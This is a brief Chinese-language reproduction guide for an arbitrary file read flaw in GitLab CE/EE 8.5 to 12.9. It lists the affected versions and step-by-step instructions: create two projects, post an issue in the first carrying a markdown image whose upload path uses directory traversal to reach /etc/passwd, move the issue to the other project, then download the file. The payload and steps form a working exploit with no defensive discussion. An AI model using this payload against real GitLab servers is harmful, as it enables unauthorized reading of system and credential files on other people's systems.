gitlab任意文件读取漏洞 复现
受影响版本
GitLab GitLab EE >=8.5,<=12.9
GitLab GitLab CE >=8.5,<=12.9
首先建立两个项目 test1 and test2
新建完后,再test1 建立一个issues
payload:
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
移动到test1 里面去。然后找到test 的issues
下载下来